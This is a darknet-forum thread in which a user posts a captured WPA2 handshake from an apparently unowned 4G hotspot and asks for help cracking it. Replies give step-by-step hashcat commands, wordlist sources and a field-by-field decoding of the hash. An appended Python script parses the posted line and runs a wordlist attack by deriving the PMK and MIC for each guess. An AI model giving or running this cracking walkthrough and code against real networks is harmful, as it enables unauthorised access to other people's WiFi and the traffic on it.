Can anyone help me to decrypt wpa2 handshake : hacking | Torhoo darknet markets

I've already captured the handshake of a WPA2-protected WiFi and converted it to a .hc22000 file, and here it is:
WPA*02*278457bf686937057eb0e6ac17e67eb8*c8eaf8284a19*1e3ebb462329*49646f6f6d2034475f3834413139*94c965eb10e2ac6c63d5b041dca125276ae7432dd0547bc08932cde6c619bb39*0103007502010a0000000000000000000007da28058428c667dfc31b7644596f18fc27ee818ec3c59aecec2bdbb7e87181000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*c2

I'm new in this domain tbh, so if anyone could help (already tried rockyou.txt).
What I know is that you need to use another router instead of yours.
/u/moonship
3 points
3 weeks ago
I would recommend not sharing a WPA2 handshake on a public forum if your goal is anonymity.

In theory, law enforcement could break the handshake, recover the WiFi password and collaborate with internet providers to identify customers with that specific WiFi password.

Sites like WiGLE exist that help locate WiFi using a unique SSID. However, extracting the WiFi SSID or BSSID from the hash seems problematic.
/u/l4wl13t 📢 🍼
1 points
3 weeks ago
I got the handshake and am trying to crack the password. Anything that can help?
/u/moonship
1 points
3 weeks ago
Note: you may have to use a command line tool to convert it into the correct format. Do some Google searches for that.

1. Run
hashcat -h | grep -i WPA
and make note of the "mode number" for WPA2.
2. Put the hash in a file:
echo '<hash>' > hash.txt
3. Get a wordlist for WPA (Google).
4. Run
hashcat -m <mode number> ./hash.txt <path-to-wordlist>
5. Let it run for a while. Depending on your hardware and the length of the wordlist it might take a while. Pick up a GTX 970 and let it run overnight.
/u/MeltingWoodwork
1 points
3 weeks ago*
Your first advice is good, moonshine. But your advice on converting it to the correct format is off; he already has it in the correct format, I believe.

edit01: and he was able to run rockyou on it already
/u/DaSnake
1 points
3 weeks ago*
I'd first try to crack it online.
There are tools, both paid and free, that support pcap and pcapng capture files; you can use their resources.
/u/l4wl13t 📢 🍼
1 points
3 weeks ago
Currently it's not a .pcap file; I converted it to .hc22000.
/u/MeltingWoodwork
1 points
3 weeks ago*
I echo moonship.

By posting that hash on the darknet you give away some info you may not want to. You are fine, don't worry; I will try to explain why for learning purposes. I may get my terminology wrong as it has been a while since I did any of this stuff, so I welcome any corrections or additions anyone has.

By the way, good job getting the pcap and converting it to 22000 format; that is half the battle. Good job!
Look into "PMKID" now and see about getting some WPA*01 instead of your WPA*02 at the start of your 22000 line. Note: the WPA*02 at the beginning of your hash does not mean WPA2.


Here is the explanation of the 22000 hash line you provided in your original post:
WPA*02*MIC*MAC_AP*MAC_CLIENT*ESSID*NONCE_AP*EAPOL_CLIENT*MESSAGEPAIR


The MAC_AP of the router or phone hotspot you got this handshake from is:
c8:ea:f8:28:4a:19
so it may be some form of ZTE phone or ZTE portable hotspot; not sure if ZTE makes routers.


The MAC_CLIENT of the device you used to get it is:
1e:3e:bb:46:23:29
assuming you didn't spoof your MAC before grabbing it.
edit01: actually I may be wrong here, that may be the client that was handshaking. If this were a WPA*01 hash then the client would be you.


The ESSID (most likely the name of the access point in this case) is:
49646f6f6d2034475f3834413139
or, if you convert from hex:
Idoom 4G_84A19

Idoom may be the name of the phone or user, but 4G_84A19 is probably some form of default naming convention someone could dig deeper into and possibly get the specific device. The 4G makes me think this is a phone's hotspot.


The biggest issue is the one moonshine stated already. Anyone can go on wigle(dot)net and search c8:ea:f8:28:4a:19 in the BSSID field and possibly get a geolocation hit. If they do get a hit, then one could assume it is your next-door neighbor and you live one door over, or at the very least that you were around that spot.

So if you do not care about that information being out on the dark web then cool. But if you weren't aware of that information being in that hash, be careful.

If you want to continue, try getting better wordlists from sites like weakpass(dot)com. For WPA2 wordlists, look for the files with "_w" at the end; they are already filtered to 8 to 30 characters with the correct characters. There are also rules and, I think, masks that can be applied to wordlists.
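The hashcat steps moonship lists and the field-by-field breakdown of the 22000 line above, carried through as an added example written for this page (it is neither hashcat's nor hcxtools' code and not the poster's): it parses the posted hc22000 line, reports what the line reveals before any cracking (BSSID, client MAC, decoded ESSID, key descriptor version, AKM suite, message pair), and implements the per-candidate check hashcat performs on the GPU: PBKDF2-HMAC-SHA1 to the PMK, then the PMKID for WPA*01 lines or the KCK and EAPOL MIC for WPA*02 lines. Only WPA*02 lines whose EAPOL frame is the client's M2 (message pair 0 or 2, which the posted line is) are handled, and AES-CMAC MICs are not; the MESSAGEPAIR table is hcxtools' numbering of the low three bits. The guesses in the wordlist at the bottom are made up for the demo and say nothing about this network.

```python
"""Decode a hashcat 22000 (hc22000) line and test passphrases against it.

Added example for this thread; not hashcat/hcxtools code and not the poster's.
POSTED_LINE is the hash from the original post, copied verbatim. Field order:
WPA*TYPE*PMKID-or-MIC*MAC_AP*MAC_CLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR.
"""
import hashlib
import hmac
from dataclasses import dataclass

POSTED_LINE = "WPA*02*278457bf686937057eb0e6ac17e67eb8*c8eaf8284a19*1e3ebb462329*49646f6f6d2034475f3834413139*94c965eb10e2ac6c63d5b041dca125276ae7432dd0547bc08932cde6c619bb39*0103007502010a0000000000000000000007da28058428c667dfc31b7644596f18fc27ee818ec3c59aecec2bdbb7e87181000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*c2"

# Low three bits of MESSAGEPAIR (hcxtools numbering); the upper bits are
# nonce-error-correction hints for hashcat and are ignored here.
MESSAGE_PAIRS = {0: "M1+M2, EAPOL from M2", 1: "M1+M4, EAPOL from M4",
                 2: "M2+M3, EAPOL from M2", 3: "M2+M3, EAPOL from M3",
                 4: "M3+M4, EAPOL from M3", 5: "M3+M4, EAPOL from M4"}

# Byte offsets inside the EAPOL-Key frame (4-byte 802.1X header, then the descriptor).
KEY_INFO, NONCE, KEYDATA_LEN, KEYDATA = 5, 17, 97, 99


@dataclass(frozen=True)
class Hc22000:
    kind: int           # 1 = PMKID line (WPA*01), 2 = 4-way handshake (WPA*02)
    digest: bytes       # 16 bytes: PMKID (kind 1) or EAPOL MIC (kind 2)
    mac_ap: bytes       # BSSID
    mac_client: bytes   # station MAC
    essid: bytes        # raw ESSID (the line carries it hex-encoded)
    anonce: bytes       # AP nonce; empty on PMKID lines
    eapol: bytes        # EAPOL-Key frame with its MIC field zeroed; empty on PMKID lines
    message_pair: int   # raw MESSAGEPAIR byte; -1 on PMKID lines


def parse_hc22000(line):
    parts = line.strip().split("*")
    if len(parts) != 9 or parts[0] != "WPA" or parts[1] not in ("01", "02"):
        raise ValueError("not an hc22000 line")
    return Hc22000(int(parts[1]), *(bytes.fromhex(p) for p in parts[2:8]),
                   int(parts[8], 16) if parts[8] else -1)


def fmt_mac(mac):
    return ":".join(f"{b:02x}" for b in mac)


def rsn_akm(eapol):
    """AKM suite selector from the RSN IE in the key data (PSK vs SAE etc.)."""
    kd_len = int.from_bytes(eapol[KEYDATA_LEN:KEYDATA_LEN + 2], "big")
    kd = eapol[KEYDATA:KEYDATA + kd_len]
    if len(kd) < 20 or kd[0] != 0x30:                   # 0x30 = RSN element id
        return "no RSN IE"
    n_pairwise = int.from_bytes(kd[8:10], "little")     # id,len,ver(2),group(4),count(2)
    suite = kd[12 + 4 * n_pairwise:16 + 4 * n_pairwise]  # skip pairwise suites + AKM count
    names = {b"\x00\x0f\xac\x02": "PSK", b"\x00\x0f\xac\x06": "PSK-SHA256",
             b"\x00\x0f\xac\x08": "SAE"}
    return f"{suite.hex()} ({names.get(suite, 'other')})"


def leaked_metadata(h):
    """What any reader of the line learns without cracking anything."""
    info = {"type": "PMKID" if h.kind == 1 else "EAPOL handshake",
            "bssid": fmt_mac(h.mac_ap), "client": fmt_mac(h.mac_client),
            "essid": h.essid.decode("utf-8", errors="replace")}
    if h.kind == 2:
        key_info = int.from_bytes(h.eapol[KEY_INFO:KEY_INFO + 2], "big")
        info["key_descriptor_version"] = key_info & 0x7   # 1 HMAC-MD5, 2 HMAC-SHA1, 3 AES-CMAC
        info["message_pair"] = MESSAGE_PAIRS.get(h.message_pair & 0x7, "unknown")
        info["akm"] = rsn_akm(h.eapol)
    return info


def derive_pmk(passphrase, essid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def derive_pmkid(pmk, mac_ap, mac_client):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); this is what a WPA*01 line stores."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_client, hashlib.sha1).digest()[:16]


def derive_kck(pmk, mac_ap, mac_client, anonce, snonce):
    """KCK = first 16 bytes of PRF-512(PMK, "Pairwise key expansion", sorted MACs || sorted nonces)."""
    data = (min(mac_ap, mac_client) + max(mac_ap, mac_client)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:16]


def expected_digest(h, passphrase):
    """PMKID or EAPOL MIC that `passphrase` would produce for this line's metadata."""
    pmk = derive_pmk(passphrase, h.essid)
    if h.kind == 1:
        return derive_pmkid(pmk, h.mac_ap, h.mac_client)
    if h.message_pair & 0x7 not in (0, 2):
        raise NotImplementedError("only lines whose EAPOL is the client's M2 are handled")
    snonce = h.eapol[NONCE:NONCE + 32]                   # M2 carries the station nonce
    kck = derive_kck(pmk, h.mac_ap, h.mac_client, h.anonce, snonce)
    version = int.from_bytes(h.eapol[KEY_INFO:KEY_INFO + 2], "big") & 0x7
    algo = {1: hashlib.md5, 2: hashlib.sha1}.get(version)
    if algo is None:
        raise NotImplementedError("AES-128-CMAC MIC (descriptor version 3) not implemented")
    return hmac.new(kck, h.eapol, algo).digest()[:16]   # MIC over the frame with MIC zeroed


def check_candidate(h, passphrase):
    return hmac.compare_digest(expected_digest(h, passphrase), h.digest)


def crack(h, candidates):
    """The wordlist loop hashcat runs on the GPU: first matching passphrase, or None."""
    for pw in candidates:
        if 8 <= len(pw) <= 63 and check_candidate(h, pw):  # WPA2 passphrase length rule
            return pw
    return None


if __name__ == "__main__":
    h = parse_hc22000(POSTED_LINE)
    for k, v in leaked_metadata(h).items():
        print(f"{k:>22}: {v}")
    # Made-up guesses for the demo, not a real wordlist; rockyou.txt already failed per the poster.
    print("matched:", crack(h, ["password", "12345678", "Idoom4G84A19"]))
```

Running it prints the BSSID, client MAC and ESSID that moonship and MeltingWoodwork warn about, plus the descriptor version (2, so the MIC is HMAC-SHA1) and the AKM (00-0f-ac-02, plain WPA2-PSK). The `crack` loop is the CPU version of step 4; at 4096 PBKDF2 rounds per guess it manages a few thousand candidates per second, which is exactly why the thread points at a GPU and `hashcat -m 22000` for real wordlists.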